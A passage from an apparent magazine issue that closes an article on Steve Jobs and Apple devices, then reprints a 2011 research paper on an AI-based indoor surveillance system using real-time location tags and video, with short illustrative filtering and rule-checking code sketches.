The next device to direct the development of high technology, this time in the field of consumer electronics, was certainly the famous iPod. Considering the existing digital music players to be either too big or too small and practically useless, and their software completely inadequate, Jobs engaged a team of engineers to design a complete line of iPods. The first model, presented in 2001, was the size of a deck of cards – a great advance at the time – stored up to 1,000 songs, and had a battery that lasted an amazing 10 hours. And, of course, the whole story of the iPod would not make sense without the iTunes Music Store, announced in 2003, which revolutionized the mass distribution of digital content.
It is probably needless to say how much the iPhone has affected the development of smartphones since 2007 with its revolutionary design and user interface. It is enough to mention that it had no worthy competitor on the market for years, and even today fans of the Apple ecosystem would not exchange it for a model from another company. However, the path from the idea to the final product was immensely demanding and difficult, especially for the engineers. It is known that Jobs smashed at least three iPhone prototypes to pieces before he was finally satisfied.

The iPhone literally changed the appearance of the mobile phone and drove the rapid growth of smartphones and, subsequently, tablet PCs. Great interest in the tablet market was sparked by Apple's iPad, which borrowed its OS and interface from the iPhone. At first viewed with a dose of scepticism as a useless device that was nothing but an enlarged iPod touch, the iPad quickly became the best-selling tablet PC ever. If success is about believing that your creation will be something extraordinary, then Jobs was certainly the greatest believer, at least in the tech world.
Jobs was frequently asked to comment on his vision. In January 2000 he told the American magazine Fortune:
"This is what customers pay us for
– to sweat all these details so it’s easy
and pleasant for them to use our computers. We’re supposed to be really
good at this. That doesn’t mean we
don’t listen to customers, but it’s hard
for them to tell you what they want
when they’ve never seen anything remotely like it. Take desktop video editing. I never got one request from someone who wanted to edit movies on his
computer. Yet now that people see it,
they say, ‘Oh my God, that’s great!’"
During his life he enjoyed the status of a rock star thanks to his interesting life story, his eccentric behaviour, and his unerring vision when it came to the products of the future. There was certainly a whole team of engineers, designers, and loyal associates standing behind his success; however, Jobs was the one who knew how to spin an idea.
UPENET
Surveillance Systems
An Intelligent Indoor Surveillance System
Rok Piltaver, Erik Dovgan, and Matjaz Gams
© Informatica, 2011
This paper was first published, in English, by Informatica (Vol. 35, issue no. 3, 2011, pp. 383-390). Informatica, <http://
www.informatica.si/> is a quarterly journal published, in English, by the Slovenian CEPIS society SDI (Slovensko Drustvo
Informatika – Slovenian Society Informatika, <http://www.drustvo-informatika.si/>).
The development of commercial real-time location systems (RTLS) enables new ICT solutions. This paper presents an intelligent surveillance system for indoor high-security environments based on an RTLS and artificial intelligence methods. The system consists of several software modules, each specialized for the detection of specific security risks. The validation
shows that the system is capable of detecting a broad range of security risks with high accuracy.
Keywords: Expert System, Fuzzy
Logic, Intelligent System, Real-Time
Locating System, Surveillance.
1 Introduction
Security of people, property, and data is becoming increasingly important in today's world. Security is ensured by physical protection and technology, such as movement detection, biometric sensors, surveillance cameras, and smart cards. However, the crucial factor in most security systems is still a human [7], who provides the intelligence of the system. Security personnel have to be trustworthy, trained and motivated, and in good mental and physical shape. Nevertheless, they are still human and as such tend to make mistakes, are subjective and biased, get tired, and can be bribed. For example, it is well known that a person watching live surveillance video often becomes tired and may therefore overlook a security risk. Another problem is finding trustworthy security personnel in foreign countries where locals are the only candidates for the job.
With that in mind, there is an opportunity to use modern information and communication technology in conjunction with methods of artificial intelligence to mitigate or even eliminate these human shortcomings and increase the level of security while lowering the overall security costs.
Authors
Rok Piltaver received his B.Sc. degree
in Computer Science from the University
of Ljubljana, Slovenia, in 2008. He is a
research assistant at the Department of
Intelligent Systems of the Jozef Stefan
Institute, Ljubljana, and a Ph.D. student
of New media and e-science at the Jozef
Stefan International Postgraduate
School where he is working on his
dissertation on combining accurate and
understandable classifiers. His research
interests are in artificial intelligence and
machine learning with applications in
ambient intelligence and ambient assisted
living. He has published two papers in international scientific journals and eight papers at international conferences, and received awards for the best innovation in Slovenia in 2009 and for the best joint project between business and academia in 2011. <[email protected]>
Erik Dovgan received his B.Sc. degree
in Computer Science from the University
of Ljubljana, Slovenia, in 2008. He is a
research assistant at the Department of
Intelligent Systems of the Jozef Stefan
Institute, Ljubljana, and a Ph.D. student
of New media and e-science at the Jozef
Stefan International Postgraduate School
where he is working on his dissertation
on multiobjective optimization of vehicle
control strategies. His research interests
are in evolutionary algorithms, stochastic
multiobjective optimization, classification
algorithms, clustering and application of
these techniques in energy efficiency,
transportation, security systems and
ambient assisted living. <erik.dovgan@
ijs.si>
Matjaz Gams is Head of Department of
Intelligent Systems at the Jozef Stefan
Institute and professor of computer
science at the University of Ljubljana and
MPS, Slovenia. He received his degrees
at the University of Ljubljana and MPS.
He teaches or has taught at 10 faculties in Slovenia and Germany. His professional interests include intelligent systems, artificial intelligence, cognitive science, intelligent agents, business intelligence and the information society. He is a member of numerous international programme committees of scientific meetings, of national strategic boards and institutions, and of the editorial boards of 11 journals, and is managing director of the Informatica journal. He was a co-founder of various societies in Slovenia, e.g. the Engineering Academy, the AI Society and the Cognitive Society, and was president and/or secretary of various societies including ACM Slovenia. He is president of the union of institute and faculty members in Slovenia. He has headed several national and international projects, including the major national employment agent on the Internet, the first to present over 90% of all available jobs in a country. His major scientific
achievement is the discovery of the
principle of multiple knowledge. In 2009
his team was awarded for the best
innovation in Slovenia and in 2011 for the
best joint project between business and
academia. <[email protected]>
Our first intelligent security system, focused on entry control, is described in [5]. In this paper we present a prototype of an intelligent indoor surveillance system (i.e., one that works in the whole indoor area and not only at entry control) that automatically detects security risks.
The prototype of an intelligent security system, called "Poveljnikova desna roka" (PDR; in English, "commander's right hand"), is specialized for the surveillance of personnel, data containers, and important equipment in indoor high-security areas (e.g., an archive of classified data with several rooms). The system is focused on internal threats; nevertheless, it also detects external security threats. It detects any unusual behaviour based on user-defined rules and automatically extracted models of the usual behaviour. The artificial intelligence methods enable the PDR system to model usual behaviour and to recognize unusual behaviour. The system is capable of autonomous learning, reasoning and adaptation. The PDR system alerts the supervisor to unusual and forbidden activities, enables an overview of the monitored environment, and offers simple and effective analysis of past events. Tagging all personnel, data containers, and important equipment is required, as it enables real-time localization and integration with automatic video surveillance. The PDR system notifies the supervisor with an alarm of the appropriate level and an easily comprehensible explanation in the form of natural language sentences, tagged video recordings and graphical animations. The PDR system detects intrusions by unidentified persons, forbidden actions by known and unknown persons, and unusual activities of tagged entities. The concrete scenarios detected by the system include theft, sabotage, staff negligence and insubordination, unauthorised entry, unusual employee behaviour and similar incidents.
The rest of the paper is structured
as follows. Section 2 summarizes the
related work. An overview of software
modules and a brief description of used
sensors are given in Section 3. Section
4 describes the five PDR modules, including the Expert System Module and
Fuzzy Logic Module in more detail.
Section 5 presents system verification
while Section 6 provides conclusions.
2 Related Work
There has been a lot of research in
the field of automatic surveillance
based on video recordings. The research ranges from extracting low-level features and modelling the usual optical flow to methods for optimal camera positioning and the evaluation of automatic video surveillance systems [8]. There are many operational implementations of such systems increasing security in public places (subway stations, airports, parking lots).
On the other hand, there has not
been much research in the field of automatic surveillance systems based on
real-time locating systems (RTLS), due to the novelty of the sensor equipment. Nevertheless, there are already some simple commercial systems with so-called room-accuracy RTLS [20] that enable tracking of objects and basic alarms based on if-then rules [18].
Some of them work outdoors using
GPS (e.g., for tracking vehicles [21])
while others use radio systems for indoor tracking (e.g., in hospitals and
warehouses). Some systems allow
video monitoring in combination with
RTLS tracking [19].
Our work is novel as it uses several
complex artificial intelligence methods
to extract models of the usual behaviour
and detect the unusual behaviour based
on an indoor RTLS. In addition, our work
also presents the benefits of combining
video and RTLS surveillance.
3 Overview of the PDR System
This section presents a short over-
view of the PDR system. The first subsection presents the sensors and hardware used by the system. The second
subsection introduces software modules. Subsection 3.3 describes RTLS
data pre-processing and primitive routines.
3.1 Sensors and other Hardware
The PDR system hardware includes
a real-time locating system (RTLS),
several IP video cameras (Figure 1), a
processing server, network infrastructure, and optionally one or more
workstations, such as personal computers, handheld devices, and mobile
phones with internet access, which are
used for alerting the security personnel.
RTLS provides the PDR system
with information about locations of all
personnel and important objects (e.g.
container with classified documents) in
the monitored area. RTLS consists of
sensors, tags, and a processing unit
(Figure 1). The sensors detect the distance and the angle at which the tags
are positioned. The processing unit
uses these measurements to calculate
the 3D coordinates of the tags. Commercially available RTLS use various
technologies: infrared, optical, ultrasound, inertial sensors, Wi-Fi, or ultra-wideband radio. The technology determines the RTLS accuracy (1 mm – 10 m), update frequency (0.1 Hz – 120 Hz), covered area (6 – 2,500 m²), size and weight of tags and sensors, various limitations (e.g., a required line of sight between sensors and tags), reliability, and price (2,000 – 150,000 €) [13]. PDR uses the Ubisense RTLS [15], which is based on ultra-wideband technology and is among the more affordable RTLSs. It uses relatively small and energy-efficient active tags, has an update rate of up to 9 Hz and an accuracy of ±20 cm in 3D space under good conditions. It covers areas of up to 900 m² and does not require line of sight.
The advantages of a RTLS are that
people feel more comfortable being
tracked by it than being filmed by video cameras, and that localization with an RTLS is simpler, more accurate, and more robust than localization from video streams. On the other hand, an RTLS is not able to locate objects that are not marked with tags. Therefore, the most vital areas also need to be monitored by video cameras in order to detect intruders that do not wear RTLS tags. However, only one PDR module requires video cameras, while the other four depend on the RTLS alone. Moreover, the cameras support on-camera processing, so only extracted features are sent over the network.

Figure 1: Overview of the PDR System.

3.2 Software Structure
The PDR software is divided into five modules. Each of them is specialized for detecting a certain kind of abnormal behaviour (i.e., a possible security risk) and uses an appropriate artificial intelligence method for detecting it. The modules reason in real time independently of each other and asynchronously trigger alarms about detected anomalies. Three of the PDR modules are able to learn automatically, while the other two use predefined knowledge and knowledge entered by the supervisor. The Video Module detects persons without tags and is the only module that needs video cameras. The Expert System Module is customisable by the supervisor, who enters information about forbidden events and actions in the form of simple rules, thus enabling automatic rule checking. The three learning modules that automatically extract models of the usual behaviour for each monitored entity and compare current behaviour with it in order to detect abnormalities are the Statistic, Macro and Fuzzy Logic Modules. The Statistic Module collects statistics about entity movement, such as time spent walking, sitting, lying, etc. The Macro Module is based on macroscopic properties such as the usual time of entry into a certain room, the day of the week, etc. Both modules analyse relatively long time intervals, while the Fuzzy Logic Module analyses short intervals. It uses fuzzy discretization to represent short actions and fuzzy logic to infer whether they are usual or not.
3.3 RTLS Data Pre-processing
and Primitive Routines
Since the RTLS used has relatively low accuracy and a relatively high update rate, two-stage data filtering is used to increase reliability and to mitigate the negative effect of the noisy location measurements. In the first stage, a median filter [1] with window size 20 is used to filter the sequences of x, y, and z coordinates of the tags. Equation (1) gives the median filter equation for direction x. The median filter is used to correct the RTLS measurements that differ from the true locations by more than ~1.5 m and occur in up to 2.5 % of measurements. Such false measurements are relatively rare and occur only in short sequences (e.g., the probability of more than 5 consecutive measurements having a high error is very low), therefore the median filter corrects these errors well.
$\tilde{x}_n = \mathrm{med}\{\,x_{n-10}, x_{n-9}, \ldots, x_{n+8}, x_{n+9}\,\}$    (1)
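As a rough illustration of this first filtering stage, the following Python sketch (not from the original paper; the window size and variable names are assumptions) applies a window-20 median filter to one coordinate stream at a time:

import numpy as np

def median_filter(coords, window=20):
    """Median-filter one coordinate stream (e.g. all x values of a tag),
    roughly following Equation (1); the window shrinks near the ends."""
    coords = np.asarray(coords, dtype=float)
    half = window // 2
    filtered = np.empty_like(coords)
    for n in range(len(coords)):
        lo = max(0, n - half)              # ~ x_{n-10}
        hi = min(len(coords), n + half)    # ~ x_{n+9}
        filtered[n] = np.median(coords[lo:hi])
    return filtered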
The second stage uses a Kalman
filter [6] that performs the following
three tasks: smoothing of the RTLS
measurements, estimating the velocities of tags, and predicting the missing
measurements. Kalman filter state is a
six dimensional vector that includes
positions and velocities in each of the
three dimensions. The new state is cal-
culated as the sum of the previous position (e.g. x_n) and the product of the previous velocity (e.g. v_x,n) and the time between consecutive measurements Δt, for each direction separately. The
velocities remain constant. Equation
(2) gives the exact vector formula used
to calculate the next state of the
Kalman filter. The measurement noise
covariance matrix was set based on
RTLS system specification, while the
process noise covariance matrix was
fine-tuned experimentally.
Once the measurements are filtered, primitive routines can be applied. They are a set of basic preprocessing methods used by all the
PDR modules and are robust to noise
in 3D location measurements. They
take short intervals of RTLS data as
input and output a symbolic representation of the processed RTLS data.
$$
\begin{bmatrix} x_{n+1} \\ y_{n+1} \\ z_{n+1} \\ v_{x,n+1} \\ v_{y,n+1} \\ v_{z,n+1} \end{bmatrix}
=
\begin{bmatrix}
1 & 0 & 0 & \Delta t & 0 & 0 \\
0 & 1 & 0 & 0 & \Delta t & 0 \\
0 & 0 & 1 & 0 & 0 & \Delta t \\
0 & 0 & 0 & 1 & 0 & 0 \\
0 & 0 & 0 & 0 & 1 & 0 \\
0 & 0 & 0 & 0 & 0 & 1
\end{bmatrix}
\begin{bmatrix} x_n \\ y_n \\ z_n \\ v_{x,n} \\ v_{y,n} \\ v_{z,n} \end{bmatrix}
\qquad (2)
$$
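A minimal sketch of the prediction step implied by Equation (2), assuming the constant-velocity model described above (the numeric values in the example are made up, and the noise covariance matrices mentioned in the text are omitted):

import numpy as np

def kalman_predict(state, dt):
    """One prediction step for the constant-velocity model of Eq. (2).
    state: 6-vector [x, y, z, vx, vy, vz]; dt: time between RTLS measurements."""
    F = np.eye(6)
    F[0, 3] = F[1, 4] = F[2, 5] = dt   # positions advance by velocity * dt
    return F @ state

# Example: a tag at (1.0, 2.0, 1.2) m moving 0.5 m/s along x, with a 9 Hz update rate
state = np.array([1.0, 2.0, 1.2, 0.5, 0.0, 0.0])
print(kalman_predict(state, dt=1 / 9))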
The first primitive routine detects
in which area (e.g., a room or a user-defined area) a given tag is located,
when it has entered, and when it has
exited from the area. The routine takes
into account the positions of walls and
doors. A special method is used to handle the situations when a tag moves
along the boundary between two areas
that are not separated by a wall.
The second primitive routine classifies the posture of a person wearing
a tag into: standing, sitting, or lying. A
parameterized classifier, trained on
104
pre-recorded and hand-labelled training data, is used to classify the sequences of tag heights into the three
postures. The algorithm has three parameters: the first two are thresholds
t_lo and t_hi dividing the height of a tag into the three states, while the third parameter is the tolerance d. The algorithm stores the previous posture and adjusts the boundaries between the postures according to it (Figure 2). If the current state is below the threshold t_i, it is increased by d, otherwise it is decreased by d. The new posture is set to the posture that occurs most often in the window of consecutive tag heights according to the dynamically set thresholds. The thresholds t_lo and t_hi were
obtained from the classification tree that
classifies the posture of a person based
on the height of a tag. It was trained on
half an hour long manually labelled re-
cording of lying, sitting and standing.
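The posture routine can be pictured as a threshold classifier with hysteresis and a small voting window; the sketch below is a loose reconstruction (the threshold values, tolerance d and window length are illustrative assumptions, not the trained parameters from the paper):

from collections import Counter

def classify_posture(heights, t_lo=0.6, t_hi=1.1, d=0.1, window=10):
    """Classify a stream of tag heights (metres) into lying / sitting / standing,
    loosely following the dynamic-threshold idea around Figure 2."""
    prev = "standing"
    recent, postures = [], []
    for h in heights:
        # shift the boundaries towards the previous posture so noise does not flip it
        lo = t_lo + d if prev == "lying" else t_lo - d
        hi = t_hi + d if prev in ("lying", "sitting") else t_hi - d
        label = "lying" if h < lo else ("sitting" if h < hi else "standing")
        recent = (recent + [label])[-window:]
        prev = Counter(recent).most_common(1)[0][0]   # most frequent recent label wins
        postures.append(prev)
    return postures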
The third group of primitive routines is a set of routines that detect
whether a tag is moving or not. This is
not a trivial task due to the considerable amount of noise in the 3D location data. There are separate routines
for detecting movement of persons,
movable objects (e.g., a laptop) and
objects that are considered stationary.
The routines include hardcoded, handcrafted, common-sense algorithms and a classifier trained on an extensive, pre-recorded, hand-labelled training set. The classifier uses the following attributes, calculated in a sliding window of size 20: the average speed, the approximate distance travelled, the sum of consecutive position distances, and the standard deviation of the moving direction. The classifier was trained on a more than two-hour-long hand-labelled recording of consecutive moving and standing still. Despite the noise in the RTLS measurements, a classification accuracy of 95 % per single classification was achieved. The classifier is described in more detail in [12].
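As an illustration of the attributes listed above, a plausible feature extraction over a window of filtered 3D positions could be sketched as follows (the function and its exact formulas are assumptions, not the implementation from [12]; the direction statistic ignores angle wrap-around):

import numpy as np

def movement_features(positions, dt):
    """Features for a window of ~20 consecutive filtered tag positions (n, 3)."""
    pos = np.asarray(positions, dtype=float)
    steps = np.diff(pos, axis=0)                     # consecutive displacement vectors
    step_len = np.linalg.norm(steps, axis=1)
    avg_speed = step_len.mean() / dt                 # average speed
    net_dist = np.linalg.norm(pos[-1] - pos[0])      # approximate distance travelled
    path_len = step_len.sum()                        # sum of consecutive position distances
    headings = np.arctan2(steps[:, 1], steps[:, 0])  # moving direction in the floor plane
    return avg_speed, net_dist, path_len, np.std(headings)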
The final group of routines detects
if two tags (or a tag and a given 3D
position) are close together by comparing the short sequences of tags’ positions. There are separate methods used
for detecting distances between two
persons (e.g., used to detect if a visitor
is too far away from its host), between
Figure 2: Dynamic Thresholds.
a person and an object, and between a
person and a given 3D location (e.g.,
used to assign tags of moving persons
to locations of moving objects detected
by video processing).
All of the described primitive routines are robust to the noise in RTLS
measurements and are specialized for
the PDR’s RTLS. Primitive routines’
parameters were tuned according to the
noise of the RTLS and using data mining tools Orange [4] and Weka [16].
In case of more accurate RTLS, the
primitive routines could be simpler and
more accurate. Nevertheless, the presented primitive routines perform well
despite the considerable amount of
noise. This is possible because of the
relatively high update rate. If it was significantly lower, the primitive routines
would not work as well. Therefore, the
accuracy, reliability and update rate of
RTLS are crucial for the performance
of the entire PDR system.
4 PDR Modules
4.1 Expert System Module
The Expert System Module enables
the supervisor to customize the PDR
system according to his/her needs by
setting simple rules that must not be
violated. It is the simplest and the most
reliable module of the PDR system
[11]. It is capable of detecting a vast
majority of the predictable security
risks, enables simple customization, is
reliable, robust to noise, raises almost
no false alarms, and offers comprehensible explanation for the raised alarms.
In addition, it does not suffer from the typical problems of learning modules and algorithms, such as a long learning period, the difficulty of learning from unlabelled data, a relatively high probability of false alarms, and the elusive balance between false negative and false positive classifications. The expert system consists of three parts, described in the following subsections.
4.1.1 Knowledge Base
Knowledge base of an expert system contains the currently available
knowledge about the state of the world.
The knowledge base of PDR expert
system consists of RTLS data,
predefined rules, and user-defined
rules. The first type of knowledge is in the form of a data stream, while the latter two are in the form of if-then rules.
The expert system gets the knowledge about objects’ positions from the
RTLS data stream. Each unit of the data
stream is a filtered RTLS measurement
that contains a 3D location with a time
stamp and a RTLS tag ID.
User-defined rules enable simple customization of the expert system according to the supervisor's specific needs by specifying prohibited and obligatory behaviour. The supervisor can add, edit, view, and delete the rules at any time using an intuitive graphical user interface. There are several rule templates available. The supervisor has to specify only the missing parameters of the rules, such as for which entities (tags), in which room(s) or user-defined area(s), and at which time the rules apply.
For instance, a supervisor can
choose to add a rule based on the following template: "Person P must be in
the room R from time T_min to time T_max." and set P to John Smith, R to the hallway H, T_min to 7 am, and T_max to 11 am.
Now the expert system knows that John
must be in the hallway from 7 am to
11 am. If he leaves the hallway during
that period or if he does not enter it
before 7 am, the PDR supervisor will
be notified.
Some of the most often used rule templates are listed below (a minimal sketch of such a rule as a data structure follows the list):
• Object O_i is not allowed to enter area A_i.
• Object O_i can only be moved by object O_j.
• Object O_i must always be close to object O_j.
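As an illustration only (the class and field names below are invented for this sketch and are not part of the PDR implementation), a user-defined rule instantiated from a template can be represented as a small data structure that the inference engine can later check against RTLS-derived facts:

from dataclasses import dataclass
from datetime import time

@dataclass
class MustBeInAreaRule:
    """Template: 'Person P must be in the room R from time T_min to time T_max.'"""
    person: str
    room: str
    t_min: time
    t_max: time

    def is_violated(self, person, room, now):
        """True if the rule applies to 'person' at 'now' and the person is elsewhere."""
        applies = person == self.person and self.t_min <= now <= self.t_max
        return applies and room != self.room

# The rule from the example: John Smith must be in hallway H from 7 am to 11 am
rule = MustBeInAreaRule("John Smith", "hallway H", time(7, 0), time(11, 0))
print(rule.is_violated("John Smith", "office 12", time(8, 32)))   # True -> alarm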
The predefined rules are a set of
rules that are valid in any application
where PDR might be used. Nevertheless, the supervisor has an option to
turn them on or off. Predefined rules
define when alarms about hardware
failures should be triggered.
4.1.2 Inference Engine
The inference engine is the part of
the PDR expert system that deduces
conclusions about security risks from
the knowledge stored in the knowledge
base. The inference process is done in
real-time. First, the RTLS data stream
is processed using the primitive routines. Second, all the rules related to a
given object (e.g., a person) are
checked. If a rule fires, an alarm is
raised and an explanation for the raised
alarm is generated. An example is presented in the next paragraph.
Suppose that the most recent 3D location of John Smith's tag (from the previous example) has just been received at 8:32 am. The inference engine checks all the rules concerning John Smith. Among them is the rule R_i that says: "John Smith must be in the hallway H from 7 am to 11 am." The inference engine calls the primitive routine that checks whether John is in the hallway H. There are two possible outcomes. In the first outcome, he is in the hallway H, and therefore the rule R_i is not violated. If John was not in the hallway H in the previous instant, there is an ongoing alarm that is now ended by the inference engine. In the second outcome, John is not in the hallway H; hence the rule R_i is violated at this moment. In this case the inference engine checks whether there is an ongoing alarm about John not being in the hallway H. If there is no such ongoing alarm, the inference engine triggers a new alarm. On the other hand, if there is such an alarm, the inference engine knows that the PDR supervisor has already been notified about it.
If an alarm was raised every time a
rule was violated, the supervisors
would get flooded with alarm messages. Therefore, the inference engine
automatically decreases the number of
alarm messages and groups alarm messages about the same incident together
so that they are easier to handle by the
PDR supervisor. The method will be
illustrated with an example. Because
of the noise in 3D location measurements the inference engine does not
trigger or end an alarm immediately
after the status of rule Ri (violated/not
violated) changes. Instead it waits for
more RTLS measurements and checks the trend in the given time window: if there are only a few instances in which the rule was violated, they are considered noise. On the other hand, if there are many such instances (more than a global threshold set by the supervisor), then the instances in which the rule was not violated are treated as noise. Two consecutive alarms that are interrupted by a short period of time will therefore result in a single alarm message. A short
period in which a rule seems to be violated because of the noise in RTLS
data, however, will not trigger an
alarm. The grouping of alarms works
in the following way: the inference
engine groups the alarm messages
based on the two rules R_i and R_j together if, at the time when rule R_i is violated, another rule R_j concerning John
Smith or hallway H is violated too. As
a result, the supervisor has to deal with
fewer alarm messages.
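A minimal sketch of the debouncing idea (the window length and threshold below are assumed values, not the supervisor-set global threshold from the paper): an alarm is raised only when rule violations dominate the recent window, and is kept open until they again fall below the threshold.

from collections import deque

class DebouncedAlarm:
    """Suppress noise-induced flicker: raise or end an alarm based on the trend
    of rule-violation flags in a sliding window rather than on single checks."""

    def __init__(self, window=30, threshold=0.5):
        self.flags = deque(maxlen=window)
        self.threshold = threshold
        self.active = False

    def update(self, violated):
        self.flags.append(bool(violated))
        share = sum(self.flags) / len(self.flags)
        if not self.active and share > self.threshold:
            self.active = True
            return "raise alarm"
        if self.active and share <= self.threshold:
            self.active = False
            return "end alarm"
        return None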
4.1.3 Generating Alarm Explanations
The Expert System Module also
provides the supervisor with an explanation of the alarm. It consists of three
parts: explanation in natural language,
graphical explanation, and video recording of the event.
Each alarm is a result of a particular rule violation. Since each rule is an
instance of a certain rule template, explanations are partially prepared in
advance. Each rule template has an
assigned pattern in the form of a sentence in natural language with some
Figure 3: Video Explanation of an Alarm.
objects and subjects missing. In order
to generate the full explanation, the
inference engine fills in the missing
parts of the sentence with details about
the objects (e.g., person names, areas,
times, etc.) related to the alarm.
The graphical explanation is given in the form of a ground-plan animation and can be played at the supervisor's request. The inference engine determines
the start and the end times of an alarm
and sets the animation to begin slightly
before the alarm was caused and to end
slightly after the causes for the alarm
are no longer present. The animation
is generated from the recorded RTLS
data and the ground plan of the building under surveillance. The animated
objects (e.g., persons, objects, areas)
that are relevant to the alarm are highlighted with red colour.
If a video recording of the incident
that caused an alarm is available it is
added to the alarm explanation. Based
on the location of the person that
caused the alarm, the person in the
video recording is marked with a
bounding rectangle (Figure 3). The
video explanation is especially important if an alarm is caused by a person
or object without a tag.
The natural language explanation,
ground plan animation, and video recordings with embedded bounding rectangles produced by the PDR expert
system efficiently indicate when and
to which events the security personnel
should pay attention.
4.2 Video Module
The Video Module periodically
checks if the movement detected by the
video cameras is caused by people
marked with tags. If it detects movement in an area where no authorised
humans are located, it triggers an
alarm. It combines the data about tag
locations and visible movement to reason about unauthorised entry.
Figure 4: Calculating the Oddity of Events (oddity of an event as a function of its lower cumulative probability, with the thresholds f_low and f_hi).
Data about visible moving objects
(with or without tags) is available as
the output of video pre-processing.
Moving objects are described with
their 3D locations in the same coordinate system as RTLS data, sizes of their
bounding boxes, similarity of the moving object with a human, and a time
stamp. The detailed description of the
algorithm that processes the video data
(developed at the Faculty of Electrical
Engineering, University of Ljubljana,
Slovenia) can be found in [9] and [10].
The Video Module determines the
pairing between the locations of tagged
personnel and the detected movement
locations. If it determines that there is
movement in a location that is far
enough from all the tagged personnel,
it raises an alarm. In this case the module reports moving of an unauthorised
person or an unknown object (e.g., a
robot) based on the similarity between
the moving object and a person. The
probability of false alarms can be reduced if several cameras are used to
monitor the area from various angles.
It also enables more accurate localization of moving objects.
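The pairing between tag locations and detected movement can be thought of as a nearest-neighbour check; the sketch below is only an illustration (the distance threshold is an assumed parameter) that flags any detected moving object lying far from every tag:

import numpy as np

def unauthorised_movements(tag_positions, detections, max_dist=1.5):
    """Return detections that cannot be paired with any tagged person.

    tag_positions : array (m, 3) of current tag locations from the RTLS
    detections    : array (k, 3) of moving-object locations from video pre-processing
    max_dist      : pairing threshold in metres (illustrative value)
    """
    tags = np.asarray(tag_positions, dtype=float)
    alarms = []
    for det in np.asarray(detections, dtype=float):
        if tags.size == 0 or np.linalg.norm(tags - det, axis=1).min() > max_dist:
            alarms.append(det)   # movement with no tag nearby -> possible intruder
    return alarms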
Whenever the Video Module triggers an alarm it also offers an explanation for it in form of video recordings
with embedded bounding boxes highlighting the critical areas (Figure 3).
The supervisor of the PDR system can
quickly determine whether the alarm
is true or false by checking the supplied video recording.
The video pre-processing algorithm
is also capable of detecting if a certain
camera is blocked (e.g. covered with a
piece of fabric). Such information is
forwarded to the Video Module that
triggers an alarm.
4.3 Fuzzy Logic Module
The Fuzzy Logic Module is based
on the following presumption: frequent
behaviour is usual and therefore uninteresting while rare behaviour is interesting as it is highly possible that it is
unwanted or at least unusual. Therefore the module counts the number of
actions done by the object under surveillance and reasons about oddity of
the observed behaviour based on the
counters. If it detects a high number of
odd events (i.e., events that rarely took
place in the past) in a short period of
time, it triggers an alarm.
The knowledge of the module is
stored in two four-dimensional arrays
of counters for each object under surveillance (implemented as red-black
trees [2]). Events are split into two categories, hence the two arrays: events
caused by movement and stationary
events. A moving event is characterised by its location, direction, and the
speed of movement. A stationary event,
on the other hand, is characterised by
location, duration and posture (lying,
sitting, or standing). When an event is
characterised, fuzzy discretization [17]
is used, hence the name of the module.
The location of an event in the floor
plane is determined using the RTLS
system and discretized in classes with
size 50 cm, therefore the module considers the area under surveillance as a
grid of 50 by 50 cm squares. The speed
of movement is estimated by the
Kalman filter. It is used to calculate the
direction which is discretized in the 8
classes (N, NE, E, SE, S, SW, W, and
NW). The scalar velocity is discretized
in the following four classes: very
slow, slow, normal, and fast. The posture is determined by a primitive routine (see Section 3.3). The duration of
an event is discretized into the following classes: 1, 2, 4, 8, 15, or 30 seconds, minutes, or hours.
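As an illustration of the discretization of a moving event (only the 50 cm grid and the eight compass directions come from the text; the speed-class boundaries are assumptions, and the fuzzy membership weighting is omitted, so this sketch shows only crisp class assignment):

import math

DIRECTIONS = ["E", "NE", "N", "NW", "W", "SW", "S", "SE"]

def discretize_moving_event(x, y, vx, vy, cell=0.5):
    """Map a moving event to (grid cell, direction class, speed class)."""
    cell_id = (int(x // cell), int(y // cell))               # 50 cm x 50 cm grid
    angle = math.degrees(math.atan2(vy, vx)) % 360
    direction = DIRECTIONS[int((angle + 22.5) // 45) % 8]    # 8 compass classes
    speed = math.hypot(vx, vy)
    if speed < 0.3:
        speed_class = "very slow"
    elif speed < 0.8:
        speed_class = "slow"
    elif speed < 1.6:
        speed_class = "normal"
    else:
        speed_class = "fast"
    return cell_id, direction, speed_class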
The fuzzy discretization has four
major advantages. The first is a smaller
amount of memory needed to store the
counters, as there is only one counter
for a whole group of similar events.
Note that the accuracy of the stored
knowledge is not significantly decreased because the discrete classes are
relatively small. The second advantage
is the time complexity of counting the
events that are similar to a given event,
which is constant instead of being dependent on the number of events seen
in the past. The third advantage is the
linear interpolation implicitly introduced by fuzzy discretization, which
enables a more accurate estimation of
the rare events’ frequencies. The fourth
advantage is the low time complexity
of updating the counters’ values compared to the time complexity of adding a new counter with value 1 for each
new event.
The oddity of the observed behaviour is calculated using a sliding window over which the average oddity of
events is calculated. Averaging the
oddity over time intervals prevents the
false alarms that would be triggered if
the oddity of single events was used
whenever RTLS data noise or short
sequences of uncommon events would
occur. The oddity of a single event is
calculated by comparing the frequency
of events similar to the given event
with the frequencies of the other
events. For this purpose the supervisor sets two relative frequencies, f_low and f_hi. The threshold f_low determines the share of the rarest events that are treated as completely unusual and are therefore assigned the maximum level of oddity. On the other hand, f_hi determines the share of the most frequent events that are treated as completely usual and are therefore assigned an oddity of 0. The oddity of an event whose frequency lies between the thresholds f_low and f_hi decreases linearly with the increasing share of events that are rarer than the given event (Figure 4).
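The oddity of a single event can thus be sketched as a piecewise-linear function of the share of past events rarer than the given one; the exact mapping of f_low and f_hi onto that cumulative axis is an assumption here, loosely following Figure 4:

def oddity(lower_cumulative_share, f_low=0.2, f_hi=0.8):
    """Oddity of an event given the share of past events that are rarer than it:
    maximum (1.0) for the rarest events, 0 for the most frequent ones, and a
    linear decrease in between."""
    p = lower_cumulative_share
    if p <= f_low:
        return 1.0
    if p >= f_hi:
        return 0.0
    return (f_hi - p) / (f_hi - f_low)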
The drawback of the described
method is a relatively long learning
period which is needed before the module starts to perform well. On the other
hand, the module discards the outdated
knowledge and emphasizes the new
data, which enables adapting to the
gradual changes in observed person’s
behaviour. The module is also highly
responsive: it takes only about 3 seconds to detect the unusual behaviour.
The module autonomously learns the
model of usual behaviour which enables the detection of the unusual behaviour. It can detect events such as
an unconscious person lying on the
floor, running in a room where people
usually do not run, a person sitting at
the table at which he usually does not
sit etc. The module also triggers an
alarm when a long sequence of events
happens for the first time. If such a false alarm is triggered, the supervisor can mark it as false. Consequently, the module will increase the appropriate counters and will not raise an alarm for that kind of behaviour in the future.
When the Fuzzy Logic Module
triggers an alarm, it also provides a
graphical explanation for it. It draws a
target-like graph in each square of the
mesh dividing the observed area. The
colour of a sector of the target represents the frequency of a given group
of similar events. The concentric circles represent the speed of movement,
